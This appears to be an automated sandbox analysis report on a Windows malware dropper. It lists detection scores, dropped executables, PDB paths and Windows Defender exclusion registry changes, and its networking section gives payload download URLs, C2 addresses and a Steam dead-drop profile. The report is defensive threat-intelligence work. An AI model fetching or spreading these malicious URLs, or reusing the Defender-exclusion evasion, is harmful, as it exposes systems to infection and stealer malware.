                      Source: http://f.alie3ksggg.com/f/oiii.exeVirustotal: Detection: 17%Perma Link
                      Source: http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exeVirustotal: Detection: 21%Perma Link
                      Source: http://5.42.66.10/download/th/space.php#Virustotal: Detection: 24%Perma Link
                      Source: http://5.42.66.10/download/th/getimage15.phpVirustotal: Detection: 23%Perma Link
                      Source: http://85.192.56.26/api/bing_release.phpVirustotal: Detection: 12%Perma Link
                      Source: https://monoblocked.com:80/525403/setup.exeVirustotal: Detection: 15%Perma Link
                      Source: C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exeReversingLabs: Detection: 91%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\oiii[1].exeReversingLabs: Detection: 45%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\123p[1].exeReversingLabs: Detection: 91%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Retailer_prog[1].exeReversingLabs: Detection: 79%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Default15_s[1].exeReversingLabs: Detection: 75%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\default_s[1].exeReversingLabs: Detection: 66%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\timeSync[1].exeReversingLabs: Detection: 54%
                      Source: C:\Users\user\AppData\Local\Turquoise CD Player\is-HB2OO.tmpReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Local\Turquoise CD Player\libeay32.dll (copy)ReversingLabs: Detection: 87%
                      Source: CHA0VZiz8y.exeReversingLabs: Detection: 39%
                      Source: CHA0VZiz8y.exeVirustotal: Detection: 41%Perma Link
                      Source: C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exeJoe Sandbox ML: detected
                      Source: C:\ProgramData\MPGPH131\MPGPH131.exeJoe Sandbox ML: detected
                      Source: C:\ProgramData\JANA timezone 2.12.66\JANA timezone 2.12.66.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_6899D9D0 CryptAcquireContextA,GetLastError,14_2_6899D9D0
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_6899DBB0 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,14_2_6899DBB0
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_6899DD20 CryptReleaseContext,14_2_6899DD20
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_6899DEE0 CryptReleaseContext,14_2_6899DEE0
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_6899DE00 CryptGenRandom,__CxxThrowException@8,14_2_6899DE00
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_689C35E0 CryptReleaseContext,14_2_689C35E0
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_6899D7D4 CryptReleaseContext,14_2_6899D7D4
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_6899D7F0 CryptReleaseContext,14_2_6899D7F0

                      Compliance

                      barindex
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeUnpacked PE file: 27.2.7U1bGcxK3Lqi_XMHDNEdJrhB.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Turquoise CD Player\turquoisecdplayer.exeUnpacked PE file: 29.2.turquoisecdplayer.exe.400000.0.unpack
                      Source: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeDirectory created: C:\Program Files\Windows Media Player\background.jpg
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: CHA0VZiz8y.exe, CHA0VZiz8y.exe, 00000000.00000003.2167855802.0000000004420000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2166974525.0000000004420000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2170119555.0000000004420000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2168305429.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2171871985.0000000005458000.00000004.00000020.00020000.00000000.sdmp, MYZqYdU5cUVwEz2j0JYbnTar.exe, 00000011.00000000.2266973416.00000000002CC000.00000002.00000001.01000000.00000010.sdmp, MYZqYdU5cUVwEz2j0JYbnTar.exe, 00000011.00000002.2592127849.00000000002CC000.00000002.00000001.01000000.00000010.sdmp
                      Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 7U1bGcxK3Lqi_XMHDNEdJrhB.exe, 7U1bGcxK3Lqi_XMHDNEdJrhB.exe, 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\x64\Release\XBundlerTlsHelper.pdb source: CHA0VZiz8y.exe, 00000000.00000000.2042780936.00000001409DF000.00000080.00000001.01000000.00000003.sdmp
                      Source: Binary string: MsMpEng.pdbH source: FIxDICT7hSLYFeTzbHHqKZ7Z.exe, 00000012.00000003.2329349408.000001F25CE30000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\weckb\source\repos\Hider\Hider\obj\x64\Release\Hider.pdb source: xS7PhKcNZTx4FuBAD1RB9kbJ.exe, 00000008.00000000.2265131582.000002967CCE2000.00000002.00000001.01000000.00000007.sdmp
                      Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.Linq.2015\Release\System.Data.SQLite.Linq.pdb source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmp
                      Source: Binary string: K:\2024-5-11\createProcessWithAdmin error\x64\Release\ConsoleApplication1.pdb source: FIxDICT7hSLYFeTzbHHqKZ7Z.exe, 00000012.00000003.2344382832.000001F25AEA4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: K:\2024-5-11\ZQDS\x64\Release\ZQDS.pdb source: FIxDICT7hSLYFeTzbHHqKZ7Z.exe, 00000012.00000003.2329349408.000001F25CE30000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmp, A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000002.2606812448.000000000420F000.00000004.00000800.00020000.00000000.sdmp, A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000002.2606812448.0000000003BD3000.00000004.00000800.00020000.00000000.sdmp, A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000002.2650479083.0000000005600000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x86.Release\corehost\cli\apphost\standalone\Release\apphost.pdb source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmp
                      Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000000.2269042041.00000000006CC000.00000080.00000001.01000000.00000013.sdmp
                      Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: CHA0VZiz8y.exe, 00000000.00000000.2042780936.0000000140BB1000.00000080.00000001.01000000.00000003.sdmp
                      Source: Binary string: $K:\2024-5-11\ZQDS\x64\Release\ZQDS.pdb source: FIxDICT7hSLYFeTzbHHqKZ7Z.exe, 00000012.00000003.2329349408.000001F25CE30000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: MsMpEng.pdb source: FIxDICT7hSLYFeTzbHHqKZ7Z.exe, 00000012.00000003.2329349408.000001F25CE30000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: CHA0VZiz8y.exe, 00000000.00000000.2042780936.0000000140BB1000.00000080.00000001.01000000.00000003.sdmp
                      Source: Binary string: F:\workspace\_work\1\s\artifacts\obj\win-x64.Release\corehost\cli\apphost\Release\apphost.pdbhhh source: CHA0VZiz8y.exe, 00000000.00000003.2138600045.000000000441E000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2139765657.0000000004420000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2138058247.0000000004B51000.00000004.00000020.00020000.00000000.sdmp, FIxDICT7hSLYFeTzbHHqKZ7Z.exe, 00000012.00000000.2266954848.00007FF762EB9000.00000002.00000001.01000000.00000011.sdmp
                      Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 7U1bGcxK3Lqi_XMHDNEdJrhB.exe, 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x86.Release\corehost\cli\apphost\standalone\Release\apphost.pdbfffGCTL source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmp
                      Source: Binary string: F:\workspace\_work\1\s\artifacts\obj\win-x64.Release\corehost\cli\apphost\Release\apphost.pdb source: CHA0VZiz8y.exe, 00000000.00000003.2138600045.000000000441E000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2139765657.0000000004420000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2138058247.0000000004B51000.00000004.00000020.00020000.00000000.sdmp, FIxDICT7hSLYFeTzbHHqKZ7Z.exe, 00000012.00000000.2266954848.00007FF762EB9000.00000002.00000001.01000000.00000011.sdmp
                      Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000002.2606812448.0000000004141000.00000004.00000800.00020000.00000000.sdmp, A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000002.2606812448.00000000042CC000.00000004.00000800.00020000.00000000.sdmp, A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000002.2650479083.00000000056BA000.00000004.08000000.00040000.00000000.sdmp

                      Change of critical system settings

                      barindex
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{7F44006F-4BAB-480A-9050-95ACCAEC3314}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions Exclusions_ExtensionsJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{7F44006F-4BAB-480A-9050-95ACCAEC3314}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions exeJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{6B21693A-22DD-4D17-ACCA-995B0978C91B}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions Exclusions_Extensions
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{6B21693A-22DD-4D17-ACCA-995B0978C91B}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions exe
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeCode function: 9_2_00464303 FindFirstFileExW,9_2_00464303
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeCode function: 11_2_00AB4303 FindFirstFileExW,11_2_00AB4303
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h14_2_05263C22
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h14_2_05263C28
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 4x nop then jmp 0526BF2Ah14_2_0526BE78
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h14_2_05262928
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h14_2_0526291C
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h14_2_052638F1
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h14_2_052638F8
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h14_2_0526C338
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h14_2_05263B10
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h14_2_05263B18
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h14_2_0526C340
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h14_2_05263A00
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h14_2_05263A08
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 4x nop then jmp 0526BF2Ah14_2_0526BA9B

                      Networking

                      barindex
                      Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199689717899
                      Source: Malware configuration extractorURLs: http://cajgtus.com/lancer/get.php
                      Source: Malware configuration extractorURLs: 5.42.65.115:40551
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: isZ9GxcFctWxrbwIS510G1_x.exe.0.dr
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: qSpvH8vXzrocweuI4m2T_hvd.exe.0.dr
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: iZZwIALp4_JozG9BWBx9J6Ng.exe.0.dr
                      Source: Joe Sandbox ViewIP Address: 34.117.186.192 34.117.186.192
                      Source: Joe Sandbox ViewIP Address: 34.117.186.192 34.117.186.192
                      Source: Joe Sandbox ViewIP Address: 85.192.56.26 85.192.56.26
                      Source: Joe Sandbox ViewIP Address: 85.192.56.26 85.192.56.26
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134495582.00000000043F9000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2138181954.00000000043F9000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.149:54674/vape/niko.exe
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.149:54674/vape/niko.exeF
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.149:54674/vape/niko.exephpX
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.111.174.109/pelikan
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.111.174.109/pelikanf
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.159/dl.php
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.159/dl.php.exe$
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.159/dl.phpO
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.159/dl.phpP
                      Source: Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2719544361.00000000016E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.65.116/lumma2305.exe
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/123p.exe
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/123p.exe4
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/123p.exeK
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/123p.exeR
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/123p.exeV
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/123p.exel
                      Source: Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2719544361.00000000016E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/Retailer_prog.exe
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002ABD000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AB7000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002ABD000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AB7000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/getimage15.php
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002ABD000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AB7000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002ABD000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AB7000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/getimage15.phpEks
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/getimage15.phpX
